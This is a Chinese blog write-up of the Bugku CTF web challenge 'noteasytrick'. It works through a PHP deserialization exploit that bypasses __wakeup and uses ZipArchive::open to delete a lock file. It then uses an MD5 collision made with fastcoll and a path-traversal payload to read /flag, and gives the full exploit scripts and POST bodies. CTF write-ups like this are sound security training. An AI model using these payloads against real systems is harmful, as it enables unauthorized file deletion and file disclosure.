Bugku noteasytrick

最新推荐文章于 2024-06-28 11:07:32 发布
最新推荐文章于 2024-06-28 11:07:32 发布
阅读量2.4k 收藏 4
点赞数 4
文章标签: php 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53460654/article/details/116798346
版权

打开环境

<?php
error_reporting(0);
ini_set("display_errors","Off");
class Jesen {
    public $filename;
    public $content;
    public $me;

    function __wakeup(){
        $this->me = new Ctf();
    }
    function __destruct() {
        $this->me->open($this->filename,$this->content);
    }
}

class Ctf {
    function __toString() {
        return "die";
    }
    function open($filename, $content){
        if(!file_get_contents("./sandbox/lock.lock")){
            echo file_get_contents(substr($_POST['b'],0,30));
            die();
        }else{
            file_put_contents("./sandbox/".md5($filename.time()),$content);
            die("or you can guess the final filename?"); 
        }
        
    }
}

if(!isset($_POST['a'])){
    highlight_file(__FILE__);
    die();
}else{
    if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
        unserialize($_POST['c']);
    }

}

代码很简单不多说 这个代码审计的关键在这里

function open($filename, $content){
        if(!file_get_contents("./sandbox/lock.lock")){
            echo file_get_contents(substr($_POST['b'],0,30));
            die();
        }else{
            file_put_contents("./sandbox/".md5($filename.time()),$content);
            die("or you can guess the final filename?"); 
        }

第一步 需要绕过wakeup
然后进这里后 ./sandbox/lock.lock这个文件存在就会到else,我们试试访问这个文件,发现它是存在的,所以到else
else这里很明显是让我们猜文件名
但它文件名又是通过md5加密的
所以想猜出来基本没有可能
到这里就会需要我们利用 ZipArchive 内置类的open方法达到删除文件效果
ZipArchive 内置类删除文件实例
php利用ZipArchive类操作文件的实例

可以去了解一下
所以这块我们的payload为:

<?php
class Jesen {

    public $filename = './sandbox/lock.lock';
    public $content = 8;
    public $me;}
$a = new  Jesen();
$zip  = new  ZipArchive;
$a->me = $zip;
$b = serialize($a);
$b = str_replace('":3:','":4:',$b);
echo $b;
echo "\n";

在这里插入图片描述

然后post上传

a[]=1&b[]=2&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}

这里用数组绕过md5的比较
然后再进行访问那个文件,会发现不存在了 ,所以成功绕过,接下来会执行这一步

echo file_get_contents(substr($_POST['b'],0,30));

这里就是我们要控制b把来利用file_get_contents获取flag
然后题目给了提示 fastcoll内置类反序列化flag在/flag
所以我们这里要利用fastcoll这个工具
fastcoll
简单说就是它能生成两个md5值相等,但是Hash值不相等的文件
所以这里可以利用它来给a,b赋值绕过,
这里我们b可以这样给值

./../../../../../../../../flag

应该也能利用伪协议,大家都可以去试试,直接这样是最简单的
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
这里跑出来两个文件
我还是不太确定是否成功
所以我用php脚本检查一下

<?php
function readmyfile($path){
    $fh=fopen($path,"rb");
    $data=fread($fh,filesize($path));
    fclose($fh);
    return$data;
}
echo md5( (readmyfile("1.txt")));
echo '============================';
//echo urlencode(readmyfile("1.txt"));
echo md5( (readmyfile("2.txt")));
//echo '============================';
//echo urlencode(readmyfile("2.txt"));

在这里插入图片描述
发现确实一样
所以可以直接URL编码了

<?php
function readmyfile($path){
    $fh=fopen($path,"rb");
    $data=fread($fh,filesize($path));
    fclose($fh);
    return$data;
}
//echo md5( (readmyfile("1.txt")));
//echo '============================';
echo urlencode(readmyfile("1.txt"));
//echo md5( (readmyfile("2.txt")));
echo '============================';
echo urlencode(readmyfile("2.txt"));

.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%D3o%83%14%14%E0%23%E1%05%DB+%19%3F%EF%D6N%F5%3Co%5EL%7C%13%0C%B6%40%BE%97%C7%B5%0B%82%BB%F6%E4l%AE%E9hk%06G%F2%9CY%23%18%E5%B6%5C%94%FD%AC%B6%FA%2C%7D%E0%3B%04%E5s4%7E%F6%CFX%02A%E9%FD%EF%C3%084%12%E7_%80%FD%CE%B0N%F7j%0Bkt%2B%9CGO%60%E5%C12B%C5%2A%84H%A3%16l%9C%EF%B8%08%C1%DE%22%7F%99hE%AC%DA+%BD%A0%89-%60%BF%B2%5B%BE============================.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%D3o%83%14%14%E0%23%E1%05%DB+%19%3F%EF%D6N%F5%3C%EF%5EL%7C%13%0C%B6%40%BE%97%C7%B5%0B%82%BB%F6%E4l%AE%E9hk%06G%F2%9C%D9%23%18%E5%B6%5C%94%FD%AC%B6%FA%2C%7D%E0%BB%04%E5s4%7E%F6%CFX%02A%E9%FD%EF%C3%084%12%E7_%80%FD%CE%B0%CE%F7j%0Bkt%2B%9CGO%60%E5%C12B%C5%2A%84H%A3%16l%9C%EF%B8%08A%DE%22%7F%99hE%AC%DA+%BD%A0%89-%E0%BF%B2%5B%BE

然后有a,b了我们还需要c的值

<?php
class Jesen{
    public$filename;
    public$content;
    public$me;

}

$a = new Jesen();
echo serialize($a);

O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}

然后进行post传参就能得到flag了

a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%AA%E9%86v%A1b%E9g%7B%C8%8A%84q%C3%7D%E0%B8%83%9B%EA%1C%E1%86%19%17%5E%3A%11%B9%A2%AB%E5%9C%1B%B6%0D%3E%84%D6%F2%8F%E8%EF1%BFm%95%F7%BC%87%C2%D9k%5D4%F1%FE%D7%F7%7B%A5%A0%DF%5D%C5P%BB%0D%27%12%D1%0DlLR%B1%D7%B4%22%D3u%60H%276%BD+%8At%C9%BF%5BOLOAp%C6%C8%AA%82k%93%9E%E8%BC%EB%B8s2%87I%DC%18%2F_I%22%F0%F3%CF%5D%05%9D%B2%0B%7DU&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%AA%E9%86v%A1b%E9g%7B%C8%8A%84q%C3%7D%E0%B8%83%9Bj%1C%E1%86%19%17%5E%3A%11%B9%A2%AB%E5%9C%1B%B6%0D%3E%84%D6%F2%8F%E8%EF1%BF%ED%95%F7%BC%87%C2%D9k%5D4%F1%FE%D7%F7%FB%A5%A0%DF%5D%C5P%BB%0D%27%12%D1%0DlLR%B1%D7%B4%22%D3u%60H%A76%BD+%8At%C9%BF%5BOLOAp%C6%C8%AA%82k%93%9E%E8%BC%EB%B8s%B2%86I%DC%18%2F_I%22%F0%F3%CF%5D%05%1D%B2%0B%7DU&c=O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}

在这里插入图片描述
希望这篇文章能够帮助你!

M1kael
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 9
    评论
CISCN2020-easytrick
qwsn
11-20 1719
0x01、Web 1.CISCN2020-easytrick 第一步:代码审计 <?php class trick{ //类:trick public $trick1; //公有属性:$trick1 public $trick2; //公有属性:$trick2 public function __destruct(){ //公有析构方法:当所在类的实例化对象销毁前,自动被调用 $this->trick1 = (string)$this->tr
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku_noteasytrick
weixin_50076644的博客
07-29 551
bugku_web_noteasytrick
Bugku WEB noteasytrick
qq_41696858的博客
07-30 518
首先感谢大佬的文章,我是一直卡在如何删除lock文件,先放传送门: https://blog.csdn.net/qq_53460654/article/details/116798346 这题的主要考点数ZipArchive类用open方法删除文件和fastcoll工具的运用 <?php error_reporting(0); ini_set("display_errors","Off"); class Jesen { public $filename; public $content
ctf-WEB-noteasytrick
god_001的博客
05-14 1447
题目链接:跳转提示 打开网址,可以直接看到网页链接: <?php error_reporting(0); ini_set("display_errors","Off"); class Jesen { public $filename; public $content; public $me; function __wakeup(){ $this->me = new Ctf(); } function __des...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku《1和0的故事.txt》
07-24
大佬可以试试
bugkuctf | noteasytrick 反序列化漏洞
菜鸡一枚
02-19 410
bugku-noteasytrick 反序列化漏洞,利用ZipArchive内置类删文件,fastcoll构造同md5不同内容文件绕过判断
BugKu-WEB-unserialize-Noteasy
最新发布
m0_52061428的博客
06-28 385
反序列化并不会执行构造函数,所以忽略 __construct() 而__destruct()是必被执行的,那么destruct中的$a("", $b);或许能够帮助我们拿到flag
bugkuCTF—Web—矛盾
ana35287的博客
11-29 128
上链接:http://123.206.87.240:8002/get/index1.php 点击链接发现了一段php代码 代码的意思是你要想拿到flag,就要构造一个GET一个参数,这个参数是不是数字和数字字符串 is_numeric()函数用于检测变量是否为数字或数字字符串 然后它又等于1 ?? 还有这种数吗? 在其他语言里面也许没有,别忘了php是一个弱...
bugctf中web方向题目记录
wanan的博客
10-06 688
bugctf中web方向题目记录
bugku Easy_Re
爱党人士
07-19 2079
上个月复习周的时候漏做了一题,(反正后面都都是安卓逆向,就剩下这题会的了,滑稽) 两种解决方案: 1 IDA 用ida载入, 这个只需知道一个知识点就OK了, 转吾爱一个大佬的解释函数, 按了f5看到主函数, 忽略了前面的变量定义,一直在找后面的那个变量, 想把它弄出来, 就是v5, 但在后面的步骤好像程序将其隐蔽起来了, 那么解题点就只能放在前面, 看到右上角, 有的机子没有设置好,只会看...
BugKuCTF 加密 easy_crypto
无限迭代中......
09-22 1767
0010 0100 01 110 1111011 11 11111 010 000 0 001101 1010 111 100 0 001101 01111 000 001101 00 10 1 0 010 0 000 1 01111 10 11110 101011 1111101 题解: 长度不一的01字符串 考虑是不是摩斯密码 C#版本 using System; using...
Bugku--web新版
qq_46874275的博客
04-10 889
~目录~web4web5web6web7web8 web4 $what=$_POST['what']; //接受post过来的参数what,存到what里 echo $what;//打印 if($what=='flag')//如果值是flag echo 'flag{****}';//打印flag hackbar在post data里写what=flag 或者bp抓包,右键change request method,在最下方写what=flag web5 $num=$_GET['num'];//获取参数n
BugkuCTF逆向EASY_RE题解
Air_cat的博客
06-17 2054
题目链接:https://ctf.bugku.com/challenges#Easy_Re 港道理,这道题对逆向新人来说有一个比较奇特的点,虽然很简单,但想必开始的时候会难到不少新朋友,我们就来看看这题是怎么回事 这种题盲猜是用od跑,那么用od(记住是中文搜索)打开试试: 很显然我们要对付的就是头顶那些代码了! 那么和我们之前做的水题不同,首先这里我们看不到flag存储的地方,然后跳进去看看:...
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M1kael

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值